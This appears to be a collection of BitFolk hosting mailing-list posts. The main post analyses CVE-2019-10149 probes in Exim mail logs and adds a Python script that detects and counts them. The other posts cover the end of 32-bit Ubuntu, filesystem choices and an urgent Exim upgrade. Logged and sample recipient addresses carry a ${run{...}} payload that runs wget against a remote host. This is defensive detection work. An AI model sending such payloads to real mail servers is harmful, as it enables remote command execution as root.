Hello,
I've just run a grep on all of my mail logs for the string "run{" to
see who's been trying to exploit CVE-2019-10149. A successful match
looks like this on my MTA (Exim):
2019-06-19 14:57:19 H=li810-176.members.linode.com (service.com) [104.237.134.176] F=<support(a)service.com> rejected RCPT <root+${run{\x2Fbin\x2Fsh\t-c\t\x22wget\x2064.50.180.45\x2ftmp\x2f85.119.82.70\x22}}(a)mail.bitfolk.com>: Unrouteable address
This appears to be attempting to execute:
sh -c "wget 64.50.180.45/tmp/85.119.82.70"
on my host. I assume that the attacker watches their HTTP logs for
requests for /tmp/85.119.82.70 and then they know they've found an
exploitable host.
Here's a list of offenders sorted by attempt count:
Count  Attacker                                                 Country  AS
-------------------------------------------------------------------------------------------------
   18  89.248.171.57   (scanner20.openportstats.com)            NL       INT-NETWORK, SC [AS202425]
    8  163.172.157.143 (143-157-172-163.rev.cloud.scaleway.com) GB       AS12876, FR [AS12876]
    6  104.237.134.176 (li810-176.members.linode.com)           US       LINODE-AP Linode, LLC, US [AS63949]
    3  149.56.142.192  (192.ip-149-56-142.net)                  CA       OVH, FR [AS16276]
    3  104.200.137.239 (mx239.odesktrack.com)                   US       TOTAL-SERVER-SOLUTIONS - Total Server Solutions L.L.C., US [AS46562]
    2  27.69.172.229   (localhost)                              VN       VIETEL-AS-AP Viettel Group, VN [AS7552]
    1  95.139.230.110  (node-110-230-139-95.domolink.tula.net)  RU       ROSTELECOM-AS, RU [AS12389]
    1  79.173.123.131  (Unset reverse DNS)                      RU       TKTOR, RU [AS44270]
    1  46.150.228.178  (Unset reverse DNS)                      RU       ABRIKOS-AS, RU [AS196768]
    1  27.70.156.161   (localhost)                              VN       VIETEL-AS-AP Viettel Group, VN [AS7552]
    1  27.69.172.239   (localhost)                              VN       VIETEL-AS-AP Viettel Group, VN [AS7552]
    1  27.69.172.214   (localhost)                              VN       VIETEL-AS-AP Viettel Group, VN [AS7552]
Most worrying, a BitFolk IP was amongst my findings, i.e. there is a
BitFolk customer VPS also doing this. Most likely they have already
been compromised by this technique. I've removed them from the
results above but I expect if you search your own logs you'll find
them. They have already been notified.
I created the above output with this script:
https://gist.github.com/grifferz/f92a9c885443a0db8776c4f2f10f914f
To use it in this case would be something like:
$ zcat -f /var/log/exim4/mainlog* \
    | grep "run{" \
    | awk -F'[' '{ gsub(/\].*/, "", $2); print $2 }' \
    | sort | uniq -c | sort -rn | ~/attackers.sh
The awk is separating an IP address out of the [1.2.3.4]. The
sort/uniq/sort is generating an event count. attackers.sh is merely
getting extra info about the IP address.
Cheers,
Andy
--
https://bitfolk.com/ -- No-nonsense VPS hosting
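As an added example (not code from the original post or from BitFolk), the same detection done in Python rather than a shell pipeline: it parses Exim mainlog rejection lines of the shape quoted above, flags recipients carrying a ${run{...}} expansion, decodes Exim's \xNN log escaping so the attempted command can be read, and counts attempts per source IP. The sample log lines are constructed, using RFC 5737 documentation addresses.

```python
import re
from collections import Counter

# Exim "rejected RCPT" line: "<date> <time> H=<host> [(<helo>)] [<ip>] ... rejected RCPT <addr>: <reason>"
LINE_RE = re.compile(
    r"^(?P<ts>\S+ \S+) H=(?P<host>\S+)(?: \([^)]*\))? \[(?P<ip>[0-9a-fA-F.:]+)\]"
    r".*?rejected RCPT <(?P<rcpt>[^>]*)>"
)
# The CVE-2019-10149 probe: a ${run{...}} string expansion in the recipient local part
RUN_RE = re.compile(r"\$\{run\{(?P<cmd>.*?)\}\}")

def decode_escapes(s):
    """Undo the \\xNN and \\t escaping Exim applies to non-printable bytes in its log."""
    s = s.replace("\\t", "\t")
    return re.sub(r"\\x([0-9a-fA-F]{2})", lambda m: chr(int(m.group(1), 16)), s)

def parse_line(line):
    """Return (source_ip, decoded_command) for a ${run{...}} probe line, else None."""
    m = LINE_RE.search(line)
    if not m:
        return None
    r = RUN_RE.search(m.group("rcpt"))
    if not r:
        return None
    return m.group("ip"), decode_escapes(r.group("cmd"))

def count_attackers(lines):
    """Attempts per source IP, most frequent first (what sort | uniq -c | sort -rn gives)."""
    counts = Counter(hit[0] for hit in map(parse_line, lines) if hit)
    return counts.most_common()

# Constructed sample lines (RFC 5737 addresses), modelled on the rejection quoted in the post.
SAMPLE_LOG = [
    "2019-06-19 14:57:19 H=probe.example.net (helo.example) [198.51.100.23] F=<support@helo.example>"
    " rejected RCPT <root+${run{\\x2Fbin\\x2Fsh\\t-c\\t\\x22wget\\x20192.0.2.45\\x2ftmp\\x2fpayload"
    "\\x22}}@mail.example.com>: Unrouteable address",
    "2019-06-19 15:02:03 H=(localhost) [203.0.113.9] F=<a@b.test> rejected RCPT"
    " <root+${run{\\x2Fbin\\x2Fsh\\t-c\\t\\x22id\\x22}}@mail.example.com>: Unrouteable address",
    "2019-06-19 15:03:10 H=mx.example.org [192.0.2.10] F=<c@d.test> rejected RCPT"
    " <nobody@mail.example.com>: Unrouteable address",
    "2019-06-19 15:09:41 H=probe.example.net (helo.example) [198.51.100.23] F=<support@helo.example>"
    " rejected RCPT <root+${run{\\x2Fbin\\x2Fsh\\t-c\\t\\x22id\\x22}}@mail.example.com>: Unrouteable address",
]

if __name__ == "__main__":
    for ip, n in count_attackers(SAMPLE_LOG):
        print(f"{n:>4} {ip}")
```

Feed it real lines with `zcat -f /var/log/exim4/mainlog*` piped into `sys.stdin` and the decoded command column shows what each probe tried to run, which is the part a bare grep count hides.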
Hello,
If I am reading this correctly:
https://discourse.ubuntu.com/t/i386-architecture-will-be-dropped-starting-w…
then 18.04 was the last LTS release of Ubuntu on 32-bit x86 CPUs.
If you wish to run Ubuntu 20.04 at BitFolk then you will need to do
that as 64-bit amd64.
As Ubuntu supports 18.04 to some degree out to the year 2028, if
you're currently on 32-bit then you could remain on that release for
some time. Although you will of course find it harder and harder to
get by with older package versions.
If you are currently on 32-bit Ubuntu and wish to switch to 64-bit
you can do so yourself by doing a self-install:
https://tools.bitfolk.com/wiki/Using_the_self-serve_net_installer
You would need to use the "arch" command first to switch from 32-bit
to 64-bit.
If re-installing is too much disruption, a reminder that we are
happy to give you an additional VM for free for up to 2 weeks for
you to migrate into:
https://tools.bitfolk.com/wiki/Migrating_to_a_new_VPS
Finally, it is possible to cross-grade from 32-bit to 64-bit, but
the procedure is complicated, scary, and not supported by either
Ubuntu or BitFolk. More info here:
http://users.digitalkingdom.org/~rlpowell/hobbies/debian_arch_up/index.html
https://wiki.debian.org/CrossGrading
(Yes, these are for Debian, but the steps are basically the same for
Ubuntu)
The only BitFolk-specific deviation from the above procedure that is
required is to make sure to use the "arch" command in the Xen Shell
to switch to 64-bit before you try to boot your 64-bit kernel.
Otherwise it starts a 32-bit boot loader that won't work. It won't
hurt anything, it just won't work until you change it.
Cheers,
Andy
--
https://bitfolk.com/ -- No-nonsense VPS hosting
With the discussion about RAID 10, that got me back to thinking about
a better/alternative system to my current RAID1+LVM+EXT4 setup on our
Linux home server and I'm looking for advice from other members.
Currently we have 13.6 TB of storage (a lot of which are photos by my
semi-professional girlfriend, and videos from our wildlife cam which
produces about 15 - 20GB of videos a day [email me off-list if you want
the URLs of my fledgling YouTube hedgehog and bird channels]).
There is some amount of file duplication, for instance where I have
stuck old backups (copied files and folders, not tar/compressed
archives) on there or photos/videos have been copied to different
folders (e.g. to categorise), so filesystems with built-in deduplication
(like I believe BTRFS has) would be nice. However my main priorities
are: maintaining data integrity, ease of administration, and really a
sub-category of that: ease to expand or shrink and reallocate storage as
required (if necessary - quotas are not required, but crashing due to a
full disk is to be avoided).
For years I have been looking at BTRFS, but it's never sounded 100%
production ready to me (although I remember that at least one distro
made it their default fs). Andy's mention of ceph and stratis were
something new to me, but I'm not sure if they are a bit much for a
single server, and I've no experience with ZFS, but I think I read about
some disadvantages that put me off a few years back, but I forget what
they were now.
Anyway, what do/would you use for this sort of scenario/requirement or
what are your experiences with suitable filesystems for my
requirements? Just to be clear - I want to ensure that a single disk
failure is very unlikely to result in data loss. Also, all disks are
currently the spinning disk type, so any features that take advantage
of SSDs would be wasted.
Thanks
Gavin
Hello,
If you run Exim and have local users you will want to make sure that
it is upgraded as a matter of urgency as there is a trivial
arbitrary command execution as root bug in most recent versions:
https://seclists.org/oss-sec/2019/q2/152
Even if you are the only local user you should upgrade as it's
possible, though more difficult, to exploit remotely.
Cheers,
Andy
--
https://bitfolk.com/ -- No-nonsense VPS hosting